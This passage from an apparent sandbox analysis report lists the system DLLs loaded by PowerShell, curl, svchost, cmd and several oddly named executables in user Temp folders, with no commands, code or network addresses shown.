Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: olepro32.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Section loaded: mswsock.dll
